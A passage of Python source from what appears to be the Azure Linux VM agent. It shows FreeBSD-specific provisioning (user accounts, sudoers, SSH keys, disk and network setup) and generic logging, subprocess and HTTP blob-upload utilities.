""" code, output = RunGetOutput("ifconfig", chk_err=False) Log(output) retries = 10 cmd = 'ifconfig | grep -A2 -B2 ether | grep -B3 inet | grep -A4 UP ' code = 1 while code > 0: if code > 0 and retries == 0: Error("GetFreeBSDEthernetInfo - Failed to detect ethernet interface") return None, None, None code, output = RunGetOutput(cmd, chk_err=False) retries -= 1 if code > 0 and retries > 0: Log("GetFreeBSDEthernetInfo - Error: retry ethernet detection " + str(retries)) if retries == 9: c, o = RunGetOutput("ifconfig | grep -A1 -B2 ether", chk_err=False) if c == 0: t = o.replace('\n', ' ') t = t.split() i = t[0][:-1] Log(RunGetOutput('id')[1]) Run('dhclient ' + i) time.sleep(10) j = output.replace('\n', ' ') j = j.split() iface = j[0][:-1] for i in range(len(j)): if j[i] == 'inet': inet = j[i + 1] elif j[i] == 'ether': mac = j[i + 1] return iface, inet, mac def CreateAccount(self, user, password, expiration, thumbprint): """ Create a user account, with 'user', 'password', 'expiration', ssh keys and sudo permissions. Returns None if successful, error string on failure. """ userentry = None try: userentry = pwd.getpwnam(user) except: pass uidmin = None try: if os.path.isfile("/etc/login.defs"): uidmin = int(GetLineStartingWith("UID_MIN", "/etc/login.defs").split()[1]) except: pass if uidmin == None: uidmin = 100 if userentry != None and userentry[2] < uidmin: Error("CreateAccount: " + user + " is a system user. Will not set password.") return "Failed to set password for system user: " + user + " (0x06)." if userentry == None: command = "pw useradd " + user + " -m" if expiration != None: command += " -e " + expiration.split('.')[0] if Run(command): Error("Failed to create user account: " + user) return "Failed to create user account: " + user + " (0x07)." else: Log("CreateAccount: " + user + " already exists. Will update password.") if password != None: self.changePass(user, password) try: # for older distros create sudoers.d if not os.path.isdir(MyDistro.sudoers_dir_base + '/sudoers.d/'): # create the /etc/sudoers.d/ directory os.mkdir(MyDistro.sudoers_dir_base + '/sudoers.d') # add the include of sudoers.d to the /etc/sudoers SetFileContents(MyDistro.sudoers_dir_base + '/sudoers', GetFileContents( MyDistro.sudoers_dir_base + '/sudoers') + '\n#includedir ' + MyDistro.sudoers_dir_base + '/sudoers.d\n') if password == None: SetFileContents(MyDistro.sudoers_dir_base + "/sudoers.d/waagent", user + " ALL = (ALL) NOPASSWD: ALL\n") else: SetFileContents(MyDistro.sudoers_dir_base + "/sudoers.d/waagent", user + " ALL = (ALL) ALL\n") os.chmod(MyDistro.sudoers_dir_base + "/sudoers.d/waagent", 0o440) except: Error("CreateAccount: Failed to configure sudo access for user.") return "Failed to configure sudo privileges (0x08)." home = MyDistro.GetHome() if thumbprint != None: dir = home + "/" + user + "/.ssh" CreateDir(dir, user, 0o700) pub = dir + "/id_rsa.pub" prv = dir + "/id_rsa" Run("ssh-keygen -y -f " + thumbprint + ".prv > " + pub) SetFileContents(prv, GetFileContents(thumbprint + ".prv")) for f in [pub, prv]: os.chmod(f, 0o600) ChangeOwner(f, user) SetFileContents(dir + "/authorized_keys", GetFileContents(pub)) ChangeOwner(dir + "/authorized_keys", user) Log("Created user account: " + user) return None def DeleteAccount(self, user): """ Delete the 'user'. Clear utmp first, to avoid error. Removes the /etc/sudoers.d/waagent file. 
""" userentry = None try: userentry = pwd.getpwnam(user) except: pass if userentry == None: Error("DeleteAccount: " + user + " not found.") return uidmin = None try: if os.path.isfile("/etc/login.defs"): uidmin = int(GetLineStartingWith("UID_MIN", "/etc/login.defs").split()[1]) except: pass if uidmin == None: uidmin = 100 if userentry[2] < uidmin: Error("DeleteAccount: " + user + " is a system user. Will not delete account.") return Run("> /var/run/utmp") # Delete utmp to prevent error if we are the 'user' deleted pid = subprocess.Popen(['rmuser', '-y', user], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).pid try: os.remove(MyDistro.sudoers_dir_base + "/sudoers.d/waagent") except: pass return def ActivateResourceDiskNoThread(self): """ Format, mount, and if specified in the configuration set resource disk as swap. """ global DiskActivated Run('cp /usr/sbin/waagent /tmp/') SetFileContents('/tmp/bsd_activate_resource_disk.py', bsd_activate_resource_disk_txt) Run('chmod +x /tmp/bsd_activate_resource_disk.py') pid = subprocess.Popen(["/tmp/bsd_activate_resource_disk.py", ""]).pid Log("Spawning bsd_activate_resource_disk.py") DiskActivated = True return def Install(self): """ Install the agent service. Check dependencies. Create /etc/waagent.conf and move old version to /etc/waagent.conf.old Copy RulesFiles to /var/lib/waagent Create /etc/logrotate.d/waagent Set /etc/ssh/sshd_config ClientAliveInterval to 180 Call ApplyVNUMAWorkaround() """ if MyDistro.checkDependencies(): return 1 os.chmod(sys.argv[0], 0o755) SwitchCwd() for a in RulesFiles: if os.path.isfile(a): if os.path.isfile(GetLastPathElement(a)): os.remove(GetLastPathElement(a)) shutil.move(a, ".") Warn("Moved " + a + " -> " + LibDir + "/" + GetLastPathElement(a)) MyDistro.registerAgentService() if os.path.isfile("/etc/waagent.conf"): try: os.remove("/etc/waagent.conf.old") except: pass try: os.rename("/etc/waagent.conf", "/etc/waagent.conf.old") Warn("Existing /etc/waagent.conf has been renamed to /etc/waagent.conf.old") except: pass SetFileContents("/etc/waagent.conf", self.waagent_conf_file) if os.path.exists('/usr/local/etc/logrotate.d/'): SetFileContents("/usr/local/etc/logrotate.d/waagent", WaagentLogrotate) filepath = "/etc/ssh/sshd_config" ReplaceFileContentsAtomic(filepath, "\n".join(filter(lambda a: not a.startswith("ClientAliveInterval"), GetFileContents(filepath).split( '\n'))) + "\nClientAliveInterval 180\n") Log("Configured SSH client probing to keep connections alive.") # ApplyVNUMAWorkaround() return 0 def mediaHasFilesystem(self, dsk): if Run('LC_ALL=C fdisk -p ' + dsk + ' | grep "invalid fdisk partition table found" ', False): return False return True def mountDVD(self, dvd, location): # At this point we cannot read a joliet option udf DVD in freebsd10 - so we 'dd' it into our location retcode, out = RunGetOutput(self.mount_dvd_cmd + dvd + ' of=' + location + '/ovf-env.xml') if retcode != 0: return retcode, out ovfxml = (GetFileContents(location + "/ovf-env.xml", asbin=False)) if ord(ovfxml[0]) > 128 and ord(ovfxml[1]) > 128 and ord(ovfxml[2]) > 128: ovfxml = ovfxml[ 3:] # BOM is not stripped. First three bytes are > 128 and not unicode chars so we ignore them. 
        ovfxml = ovfxml.strip(chr(0x00))
        ovfxml = "".join(filter(lambda x: ord(x) < 128, ovfxml))
        ovfxml = re.sub(r'</Environment>.*\Z', '', ovfxml, 0, re.DOTALL)
        ovfxml += '</Environment>'
        SetFileContents(location + "/ovf-env.xml", ovfxml)
        return retcode, out

    def GetHome(self):
        return '/home'

    def initScsiDiskTimeout(self):
        """
        Set the SCSI disk timeout by updating the kernel config
        """
        timeout = Config.get("OS.RootDeviceScsiTimeout")
        if timeout:
            Run("sysctl kern.cam.da.default_timeout=" + timeout)

    def setScsiDiskTimeout(self):
        return

    def setBlockDeviceTimeout(self, device, timeout):
        return

    def getProcessorCores(self):
        return int(RunGetOutput("sysctl hw.ncpu | awk '{print $2}'")[1])

    def getTotalMemory(self):
        # Integer division keeps the result an int on Python 3 as well.
        return int(RunGetOutput("sysctl hw.realmem | awk '{print $2}'")[1]) // 1024

    def setDefaultGateway(self, gateway):
        Run("/sbin/route add default " + gateway, chk_err=False)

    def routeAdd(self, net, mask, gateway):
        Run("/sbin/route add -net " + net + " " + mask + " " + gateway, chk_err=False)


############################################################
# END DISTRO CLASS DEFS
############################################################

# This lets us index into a string or an array of integers transparently.
def Ord(a):
    """
    Allows indexing into a string or an array of integers transparently.
    Generic utility function.
    """
    if type(a) == type("a"):
        a = ord(a)
    return a


def IsLinux():
    """
    Returns True if platform is Linux.
    Generic utility function.
    """
    return (platform.uname()[0] == "Linux")


def GetLastPathElement(path):
    """
    Similar to basename.
    Generic utility function.
    """
    return path.rsplit('/', 1)[1]


def GetFileContents(filepath, asbin=False):
    """
    Read and return contents of 'filepath'.
    """
    mode = 'r'
    if asbin:
        mode += 'b'
    c = None
    try:
        with open(filepath, mode) as F:
            c = F.read()
    except IOError as e:
        ErrorWithPrefix('GetFileContents', 'Reading from file ' + filepath + ' Exception is ' + str(e))
        return None
    return c


def SetFileContents(filepath, contents):
    """
    Write 'contents' to 'filepath'.
    """
    if type(contents) == str:
        contents = contents.encode('latin-1', 'ignore')
    try:
        with open(filepath, "wb+") as F:
            F.write(contents)
    except IOError as e:
        ErrorWithPrefix('SetFileContents', 'Writing to file ' + filepath + ' Exception is ' + str(e))
        return None
    return 0


def AppendFileContents(filepath, contents):
    """
    Append 'contents' to 'filepath'.
    """
    if type(contents) == str:
        contents = contents.encode('latin-1')
    try:
        with open(filepath, "a+") as F:
            F.write(contents)
    except IOError as e:
        ErrorWithPrefix('AppendFileContents', 'Appending to file ' + filepath + ' Exception is ' + str(e))
        return None
    return 0


def ReplaceFileContentsAtomic(filepath, contents):
    """
    Write 'contents' to 'filepath' by creating a temp file, and replacing original.
    """
    handle, temp = tempfile.mkstemp(dir=os.path.dirname(filepath))
    if type(contents) == str:
        contents = contents.encode('latin-1')
    try:
        os.write(handle, contents)
    except IOError as e:
        ErrorWithPrefix('ReplaceFileContentsAtomic', 'Writing to file ' + filepath + ' Exception is ' + str(e))
        return None
    finally:
        os.close(handle)
    try:
        os.rename(temp, filepath)
        return None
    except IOError as e:
        ErrorWithPrefix('ReplaceFileContentsAtomic', 'Renaming ' + temp + ' to ' + filepath + ' Exception is ' + str(e))
    try:
        os.remove(filepath)
    except IOError as e:
        ErrorWithPrefix('ReplaceFileContentsAtomic', 'Removing ' + filepath + ' Exception is ' + str(e))
    try:
        os.rename(temp, filepath)
    except IOError as e:
        ErrorWithPrefix('ReplaceFileContentsAtomic', 'Renaming ' + temp + ' to ' + filepath + ' Exception is ' + str(e))
        return 1
    return 0


def GetLineStartingWith(prefix, filepath):
    """
    Return line from 'filepath' if the line startswith 'prefix'
    """
    for line in GetFileContents(filepath).split('\n'):
        if line.startswith(prefix):
            return line
    return None


def Run(cmd, chk_err=True):
    """
    Calls RunGetOutput on 'cmd', returning only the return code.
    If chk_err=True then errors will be reported in the log.
    If chk_err=False then errors will be suppressed from the log.
    """
    retcode, out = RunGetOutput(cmd, chk_err)
    return retcode


def RunGetOutput(cmd, chk_err=True, log_cmd=True):
    """
    Wrapper for subprocess.check_output.
    Execute 'cmd'. Returns return code and STDOUT, trapping expected exceptions.
    Reports exceptions to Error if chk_err parameter is True
    """
    if log_cmd:
        LogIfVerbose(cmd)
    try:
        output = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
    except subprocess.CalledProcessError as e:
        if chk_err and log_cmd:
            Error('CalledProcessError. Error Code is ' + str(e.returncode))
            Error('CalledProcessError. Command string was ' + e.cmd)
            Error('CalledProcessError. Command result was ' + (e.output[:-1]).decode('latin-1'))
        return e.returncode, e.output.decode('latin-1')
    return 0, output.decode('latin-1')


def RunSendStdin(cmd, input, chk_err=True, log_cmd=True):
    """
    Wrapper for subprocess.Popen.
    Execute 'cmd', sending 'input' to STDIN of 'cmd'.
    Returns return code and STDOUT, trapping expected exceptions.
    Reports exceptions to Error if chk_err parameter is True
    """
    if log_cmd:
        LogIfVerbose(cmd + input)
    try:
        me = subprocess.Popen([cmd], shell=True, stdin=subprocess.PIPE,
                              stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
        output = me.communicate(input)
    except OSError as e:
        # 'me' and 'output' are not bound if Popen/communicate raised, so report the OSError itself.
        if chk_err and log_cmd:
            Error('OSError. Error Code is ' + str(e.errno))
            Error('OSError. Command string was ' + cmd)
            Error('OSError. Command result was ' + str(e))
        return 1, str(e)
    if me.returncode != 0 and chk_err is True and log_cmd:
        Error('CalledProcessError. Error Code is ' + str(me.returncode))
        Error('CalledProcessError. Command string was ' + cmd)
        Error('CalledProcessError. Command result was ' + output[0].decode('latin-1'))
    return me.returncode, output[0].decode('latin-1')


def GetNodeTextData(a):
    """
    Filter non-text nodes from DOM tree
    """
    for b in a.childNodes:
        if b.nodeType == b.TEXT_NODE:
            return b.data


def GetHome():
    """
    Attempt to guess the $HOME location.
    Return the path string.
    """
    home = None
    try:
        home = GetLineStartingWith("HOME", "/etc/default/useradd").split('=')[1].strip()
    except:
        pass
    if (home == None) or (home.startswith("/") == False):
        home = "/home"
    return home


def ChangeOwner(filepath, user):
    """
    Lookup user. Attempt chown 'filepath' to 'user'.
""" p = None try: p = pwd.getpwnam(user) except: pass if p != None: if not os.path.exists(filepath): Error("Path does not exist: {0}".format(filepath)) else: os.chown(filepath, p[2], p[3]) def CreateDir(dirpath, user, mode): """ Attempt os.makedirs, catch all exceptions. Call ChangeOwner afterwards. """ try: os.makedirs(dirpath, mode) except: pass ChangeOwner(dirpath, user) def CreateAccount(user, password, expiration, thumbprint): """ Create a user account, with 'user', 'password', 'expiration', ssh keys and sudo permissions. Returns None if successful, error string on failure. """ userentry = None try: userentry = pwd.getpwnam(user) except: pass uidmin = None try: uidmin = int(GetLineStartingWith("UID_MIN", "/etc/login.defs").split()[1]) except: pass if uidmin == None: uidmin = 100 if userentry != None and userentry[2] < uidmin: Error("CreateAccount: " + user + " is a system user. Will not set password.") return "Failed to set password for system user: " + user + " (0x06)." if userentry == None: command = "useradd -m " + user if expiration != None: command += " -e " + expiration.split('.')[0] if Run(command): Error("Failed to create user account: " + user) return "Failed to create user account: " + user + " (0x07)." else: Log("CreateAccount: " + user + " already exists. Will update password.") if password != None: MyDistro.changePass(user, password) try: # for older distros create sudoers.d if not os.path.isdir('/etc/sudoers.d/'): # create the /etc/sudoers.d/ directory os.mkdir('/etc/sudoers.d/') # add the include of sudoers.d to the /etc/sudoers SetFileContents('/etc/sudoers', GetFileContents('/etc/sudoers') + '\n#includedir /etc/sudoers.d\n') if password == None: SetFileContents("/etc/sudoers.d/waagent", user + " ALL = (ALL) NOPASSWD: ALL\n") else: SetFileContents("/etc/sudoers.d/waagent", user + " ALL = (ALL) ALL\n") os.chmod("/etc/sudoers.d/waagent", 0o440) except: Error("CreateAccount: Failed to configure sudo access for user.") return "Failed to configure sudo privileges (0x08)." home = MyDistro.GetHome() if thumbprint != None: dir = home + "/" + user + "/.ssh" CreateDir(dir, user, 0o700) pub = dir + "/id_rsa.pub" prv = dir + "/id_rsa" Run("ssh-keygen -y -f " + thumbprint + ".prv > " + pub) SetFileContents(prv, GetFileContents(thumbprint + ".prv")) for f in [pub, prv]: os.chmod(f, 0o600) ChangeOwner(f, user) SetFileContents(dir + "/authorized_keys", GetFileContents(pub)) ChangeOwner(dir + "/authorized_keys", user) Log("Created user account: " + user) return None def DeleteAccount(user): """ Delete the 'user'. Clear utmp first, to avoid error. Removes the /etc/sudoers.d/waagent file. """ userentry = None try: userentry = pwd.getpwnam(user) except: pass if userentry == None: Error("DeleteAccount: " + user + " not found.") return uidmin = None try: uidmin = int(GetLineStartingWith("UID_MIN", "/etc/login.defs").split()[1]) except: pass if uidmin == None: uidmin = 100 if userentry[2] < uidmin: Error("DeleteAccount: " + user + " is a system user. Will not delete account.") return Run("> /var/run/utmp") # Delete utmp to prevent error if we are the 'user' deleted Run("userdel -f -r " + user) try: os.remove("/etc/sudoers.d/waagent") except: pass return def IsInRangeInclusive(a, low, high): """ Return True if 'a' in 'low' <= a >= 'high' """ return (a >= low and a <= high) def IsPrintable(ch): """ Return True if character is displayable. 
""" return IsInRangeInclusive(ch, Ord('A'), Ord('Z')) or IsInRangeInclusive(ch, Ord('a'), Ord('z')) or IsInRangeInclusive(ch, Ord('0'), Ord('9')) def HexDump(buffer, size): """ Return Hex formated dump of a 'buffer' of 'size'. """ if size < 0: size = len(buffer) result = "" for i in range(0, size): if (i % 16) == 0: result += "%06X: " % i byte = buffer[i] if type(byte) == str: byte = ord(byte.decode('latin1')) result += "%02X " % byte if (i & 15) == 7: result += " " if ((i + 1) % 16) == 0 or (i + 1) == size: j = i while ((j + 1) % 16) != 0: result += " " if (j & 7) == 7: result += " " j += 1 result += " " for j in range(i - (i % 16), i + 1): byte = buffer[j] if type(byte) == str: byte = ord(byte.decode('latin1')) k = '.' if IsPrintable(byte): k = chr(byte) result += k if (i + 1) != size: result += "\n" return result def SimpleLog(file_path, message): if not file_path or len(message) < 1: return t = time.localtime() t = "%04u/%02u/%02u %02u:%02u:%02u " % (t.tm_year, t.tm_mon, t.tm_mday, t.tm_hour, t.tm_min, t.tm_sec) lines = re.sub(re.compile(r'^(.)', re.MULTILINE), t + r'\1', message) with open(file_path, "a") as F: lines = filter(lambda x: x in string.printable, lines) F.write(lines.encode('ascii', 'ignore') + "\n") class Logger(object): """ The Agent's logging assumptions are: For Log, and LogWithPrefix all messages are logged to the self.file_path and to the self.con_path. Setting either path parameter to None skips that log. If Verbose is enabled, messages calling the LogIfVerbose method will be logged to file_path yet not to con_path. Error and Warn messages are normal log messages with the 'ERROR:' or 'WARNING:' prefix added. """ def __init__(self, filepath, conpath, verbose=False): """ Construct an instance of Logger. """ self.file_path = filepath self.con_path = conpath self.verbose = verbose def ThrottleLog(self, counter): """ Log everything up to 10, every 10 up to 100, then every 100. """ return (counter < 10) or ((counter < 100) and ((counter % 10) == 0)) or ((counter % 100) == 0) def LogToFile(self, message): """ Write 'message' to logfile. """ if self.file_path: try: with open(self.file_path, "a") as F: message = filter(lambda x: x in string.printable, message) F.write(message.encode('ascii', 'ignore') + "\n") except IOError as e: ##print e pass def LogToCon(self, message): """ Write 'message' to /dev/console. This supports serial port logging if the /dev/console is redirected to ttys0 in kernel boot options. """ if self.con_path: try: with open(self.con_path, "w") as C: message = filter(lambda x: x in string.printable, message) C.write(message.encode('ascii', 'ignore') + "\n") except IOError as e: pass def Log(self, message): """ Standard Log function. Logs to self.file_path, and con_path """ self.LogWithPrefix("", message) def LogWithPrefix(self, prefix, message): """ Prefix each line of 'message' with current time+'prefix'. """ t = time.localtime() t = "%04u/%02u/%02u %02u:%02u:%02u " % (t.tm_year, t.tm_mon, t.tm_mday, t.tm_hour, t.tm_min, t.tm_sec) t += prefix for line in message.split('\n'): line = t + line self.LogToFile(line) self.LogToCon(line) def NoLog(self, message): """ Don't Log. """ pass def LogIfVerbose(self, message): """ Only log 'message' if global Verbose is True. """ self.LogWithPrefixIfVerbose('', message) def LogWithPrefixIfVerbose(self, prefix, message): """ Only log 'message' if global Verbose is True. Prefix each line of 'message' with current time+'prefix'. 
""" if self.verbose == True: t = time.localtime() t = "%04u/%02u/%02u %02u:%02u:%02u " % (t.tm_year, t.tm_mon, t.tm_mday, t.tm_hour, t.tm_min, t.tm_sec) t += prefix for line in message.split('\n'): line = t + line self.LogToFile(line) self.LogToCon(line) def Warn(self, message): """ Prepend the text "WARNING:" to the prefix for each line in 'message'. """ self.LogWithPrefix("WARNING:", message) def Error(self, message): """ Call ErrorWithPrefix(message). """ ErrorWithPrefix("", message) def ErrorWithPrefix(self, prefix, message): """ Prepend the text "ERROR:" to the prefix for each line in 'message'. Errors written to logfile, and /dev/console """ self.LogWithPrefix("ERROR:", message) def LoggerInit(log_file_path, log_con_path, verbose=False): """ Create log object and export its methods to global scope. """ global Log, LogWithPrefix, LogIfVerbose, LogWithPrefixIfVerbose, Error, ErrorWithPrefix, Warn, NoLog, ThrottleLog, myLogger l = Logger(log_file_path, log_con_path, verbose) Log, LogWithPrefix, LogIfVerbose, LogWithPrefixIfVerbose, Error, ErrorWithPrefix, Warn, NoLog, ThrottleLog, myLogger = l.Log, l.LogWithPrefix, l.LogIfVerbose, l.LogWithPrefixIfVerbose, l.Error, l.ErrorWithPrefix, l.Warn, l.NoLog, l.ThrottleLog, l class HttpResourceGoneError(Exception): pass class Util(object): """ Http communication class. Base of GoalState, and Agent classes. """ RetryWaitingInterval = 10 def __init__(self): self.Endpoint = None def _ParseUrl(self, url): secure = False host = self.Endpoint path = url port = None # "http[s]://hostname[:port][/]" if url.startswith("http://"): url = url[7:] if "/" in url: host = url[0: url.index("/")] path = url[url.index("/"):] else: host = url path = "/" elif url.startswith("https://"): secure = True url = url[8:] if "/" in url: host = url[0: url.index("/")] path = url[url.index("/"):] else: host = url path = "/" if host is None: raise ValueError("Host is invalid:{0}".format(url)) if (":" in host): pos = host.rfind(":") port = int(host[pos + 1:]) host = host[0:pos] return host, port, secure, path def GetHttpProxy(self, secure): """ Get http_proxy and https_proxy from environment variables. Username and password is not supported now. """ host = Config.get("HttpProxy.Host") port = Config.get("HttpProxy.Port") return (host, port) def _HttpRequest(self, method, host, path, port=None, data=None, secure=False, headers=None, proxyHost=None, proxyPort=None): resp = None conn = None try: if secure: port = 443 if port is None else port if proxyHost is not None and proxyPort is not None: conn = httplibs.HTTPSConnection(proxyHost, proxyPort, timeout=10) conn.set_tunnel(host, port) # If proxy is used, full url is needed. path = "https://{0}:{1}{2}".format(host, port, path) else: conn = httplibs.HTTPSConnection(host, port, timeout=10) else: port = 80 if port is None else port if proxyHost is not None and proxyPort is not None: conn = httplibs.HTTPConnection(proxyHost, proxyPort, timeout=10) # If proxy is used, full url is needed. 
                    path = "http://{0}:{1}{2}".format(host, port, path)
                else:
                    conn = httplibs.HTTPConnection(host, port, timeout=10)
            if headers == None:
                conn.request(method, path, data)
            else:
                conn.request(method, path, data, headers)
            resp = conn.getresponse()
        except httplibs.HTTPException as e:
            Error('HTTPException {0}, args:{1}'.format(e, repr(e.args)))
        except IOError as e:
            Error('Socket IOError {0}, args:{1}'.format(e, repr(e.args)))
        return resp

    def HttpRequest(self, method, url, data=None, headers=None, maxRetry=3, chkProxy=False):
        """
        Send an http request to the server.
        On error, sleep 10 seconds and retry up to maxRetry times.
        Return the response or None.
        """
        LogIfVerbose("HTTP Req: {0} {1}".format(method, url))
        LogIfVerbose("HTTP Req: Data={0}".format(data))
        LogIfVerbose("HTTP Req: Header={0}".format(headers))
        try:
            host, port, secure, path = self._ParseUrl(url)
        except ValueError as e:
            Error("Failed to parse url:{0}".format(url))
            return None
        # Check proxy
        proxyHost, proxyPort = (None, None)
        if chkProxy:
            proxyHost, proxyPort = self.GetHttpProxy(secure)
        # If httplib module is not built with ssl support. Fallback to http
        if secure and not hasattr(httplibs, "HTTPSConnection"):
            Warn("httplib is not built with ssl support")
            secure = False
            proxyHost, proxyPort = self.GetHttpProxy(secure)
        # If httplib module doesn't support https tunnelling. Fallback to http
        if secure and \
                proxyHost is not None and \
                proxyPort is not None and \
                not hasattr(httplibs.HTTPSConnection, "set_tunnel"):
            Warn("httplib doesn't support https tunnelling(new in python 2.7)")
            secure = False
            proxyHost, proxyPort = self.GetHttpProxy(secure)
        resp = self._HttpRequest(method, host, path, port=port, data=data, secure=secure,
                                 headers=headers, proxyHost=proxyHost, proxyPort=proxyPort)
        for retry in range(0, maxRetry):
            if resp is not None and \
                    (resp.status == httplibs.OK or
                     resp.status == httplibs.CREATED or
                     resp.status == httplibs.ACCEPTED):
                return resp
            if resp is not None and resp.status == httplibs.GONE:
                raise HttpResourceGoneError("Http resource gone.")
            Error("Retry={0}".format(retry))
            Error("HTTP Req: {0} {1}".format(method, url))
            Error("HTTP Req: Data={0}".format(data))
            Error("HTTP Req: Header={0}".format(headers))
            if resp is None:
                Error("HTTP Err: response is empty.")
            else:
                Error("HTTP Err: Status={0}".format(resp.status))
                Error("HTTP Err: Reason={0}".format(resp.reason))
                Error("HTTP Err: Header={0}".format(resp.getheaders()))
                Error("HTTP Err: Body={0}".format(resp.read()))
            time.sleep(self.__class__.RetryWaitingInterval)
            resp = self._HttpRequest(method, host, path, port=port, data=data, secure=secure,
                                     headers=headers, proxyHost=proxyHost, proxyPort=proxyPort)
        return None

    def HttpGet(self, url, headers=None, maxRetry=3, chkProxy=False):
        return self.HttpRequest("GET", url, headers=headers, maxRetry=maxRetry, chkProxy=chkProxy)

    def HttpHead(self, url, headers=None, maxRetry=3, chkProxy=False):
        return self.HttpRequest("HEAD", url, headers=headers, maxRetry=maxRetry, chkProxy=chkProxy)

    def HttpPost(self, url, data, headers=None, maxRetry=3, chkProxy=False):
        return self.HttpRequest("POST", url, data=data, headers=headers, maxRetry=maxRetry, chkProxy=chkProxy)

    def HttpPut(self, url, data, headers=None, maxRetry=3, chkProxy=False):
        return self.HttpRequest("PUT", url, data=data, headers=headers, maxRetry=maxRetry, chkProxy=chkProxy)

    def HttpDelete(self, url, headers=None, maxRetry=3, chkProxy=False):
        return self.HttpRequest("DELETE", url, headers=headers, maxRetry=maxRetry, chkProxy=chkProxy)

    def HttpGetWithoutHeaders(self, url, maxRetry=3, chkProxy=False):
        """
        Return data from an HTTP get on 'url'.
        """
        resp = self.HttpGet(url, headers=None, maxRetry=maxRetry, chkProxy=chkProxy)
        return resp.read() if resp is not None else None

    def HttpGetWithHeaders(self, url, maxRetry=3, chkProxy=False):
        """
        Return data from an HTTP get on 'url' with
        x-ms-agent-name and x-ms-version headers.
        """
        resp = self.HttpGet(url, headers={
            "x-ms-agent-name": GuestAgentName,
            "x-ms-version": ProtocolVersion
        }, maxRetry=maxRetry, chkProxy=chkProxy)
        return resp.read() if resp is not None else None

    def HttpSecureGetWithHeaders(self, url, transportCert, maxRetry=3, chkProxy=False):
        """
        Return output of get using ssl cert.
        """
        resp = self.HttpGet(url, headers={
            "x-ms-agent-name": GuestAgentName,
            "x-ms-version": ProtocolVersion,
            "x-ms-cipher-name": "DES_EDE3_CBC",
            "x-ms-guest-agent-public-x509-cert": transportCert
        }, maxRetry=maxRetry, chkProxy=chkProxy)
        return resp.read() if resp is not None else None

    def HttpPostWithHeaders(self, url, data, maxRetry=3, chkProxy=False):
        headers = {
            "x-ms-agent-name": GuestAgentName,
            "Content-Type": "text/xml; charset=utf-8",
            "x-ms-version": ProtocolVersion
        }
        try:
            return self.HttpPost(url, data=data, headers=headers, maxRetry=maxRetry, chkProxy=chkProxy)
        except HttpResourceGoneError as e:
            Error("Failed to post: {0} {1}".format(url, e))
            return None


__StorageVersion = "2014-02-14"


def GetBlobType(url):
    restutil = Util()
    # Check blob type
    LogIfVerbose("Check blob type.")
    timestamp = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())
    blobPropResp = restutil.HttpHead(url, {
        "x-ms-date": timestamp,
        'x-ms-version': __StorageVersion
    }, chkProxy=True)
    blobType = None
    if blobPropResp is None:
        Error("Can't get status blob type.")
        return None
    blobType = blobPropResp.getheader("x-ms-blob-type")
    LogIfVerbose("Blob type={0}".format(blobType))
    return blobType


def PutBlockBlob(url, data):
    restutil = Util()
    LogIfVerbose("Upload block blob")
    timestamp = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())
    ret = restutil.HttpPut(url, data, {
        "x-ms-date": timestamp,
        "x-ms-blob-type": "BlockBlob",
        "Content-Length": str(len(data)),
        "x-ms-version": __StorageVersion
    }, chkProxy=True)
    if ret is None:
        Error("Failed to upload block blob for status.")
        return -1
    return 0


def PutPageBlob(url, data):
    restutil = Util()
    LogIfVerbose("Replace old page blob")
    timestamp = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())
    # Align to 512 bytes (integer division keeps this exact on Python 3 as well)
    pageBlobSize = ((len(data) + 511) // 512) * 512
    ret = restutil.HttpPut(url, "", {
        "x-ms-date": timestamp,
        "x-ms-blob-type": "PageBlob",
        "Content-Length": "0",
        "x-ms-blob-content-length": str(pageBlobSize),
        "x-ms-version": __StorageVersion
    }, chkProxy=True)
    if ret is None:
        Error("Failed to clean up page blob for status")
        return -1
    # str.find returns -1 when '?' is absent; str.index would raise ValueError here.
    if url.find('?') < 0:
        url = "{0}?comp=page".format(url)
    else:
        url = "{0}&comp=page".format(url)

    LogIfVerbose("Upload page blob")
    pageMax = 4 * 1024 * 1024  # Max page size: 4MB
    start = 0
    end = 0
    while end < len(data):
        end = min(len(data), start + pageMax)
        contentSize = end - start
        # Align to 512 bytes
        pageEnd = ((end + 511) // 512) * 512
        bufSize = pageEnd - start
        buf = bytearray(bufSize)
        buf[0: contentSize] = data[start: end]
        if sys.version_info > (3,):
            buffer = memoryview
        ret = restutil.HttpPut(url, buffer(buf), {
            "x-ms-date": timestamp,
            "x-ms-range": "bytes={0}-{1}".format(start, pageEnd - 1),
            "x-ms-page-write": "update",
            "x-ms-version": __StorageVersion,
            "Content-Length": str(pageEnd - start)
        }, chkProxy=True)
        if ret is None:
            Error("Failed to upload page blob for status")
            return -1
        start = end
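    # Worked example of the 512-byte alignment used above (numbers are illustrative only):
    # for len(data) == 1000 the initial header PUT advertises
    #     x-ms-blob-content-length = ((1000 + 511) // 512) * 512 = 1024
    # and the single page write that follows covers "x-ms-range: bytes=0-1023", with the
    # final 24 bytes of that page left as the zero padding already present in the bytearray.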
return 0 def UploadStatusBlob(url, data): LogIfVerbose("Upload status blob") LogIfVerbose("Status={0}".format(data)) blobType = GetBlobType(url) if blobType == "BlockBlob": return PutBlockBlob(url, data) elif blobType == "PageBlob": return PutPageBlob(url, data) else: Error("Unknown blob type: {0}".format(blobType)) return -1 class TCPHandler(SocketServers.BaseRequestHandler): """ Callback object for LoadBalancerProbeServer. Recv and send LB probe messages. """ def __init__(self, lb_probe): super(TCPHandler, self).__init__() self.lb_probe = lb_probe def GetHttpDateTimeNow(self): """ Return formatted gmtime "Date: Fri, 25 Mar 2011 04:53:10 GMT" """ return time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()) def handle(self): """ Log LB probe messages, read the socket buffer, send LB probe response back to server. """ self.lb_probe.ProbeCounter = (self.lb_probe.ProbeCounter + 1) % 1000000 log = [NoLog, LogIfVerbose][ThrottleLog(self.lb_probe.ProbeCounter)] strCounter = str(self.lb_probe.ProbeCounter) if self.lb_probe.ProbeCounter == 1: Log("Receiving LB probes.") log("Received LB probe # " + strCounter) self.request.recv(1024) self.request.send( "HTTP/1.1 200 OK\r\nContent-Length: 2\r\nContent-Type: text/html\r\nDate: " + self.GetHttpDateTimeNow() + "\r\n\r\nOK") class LoadBalancerProbeServer(object): """ Threaded object to receive and send LB probe messages. Load Balancer messages but be recv'd by the load 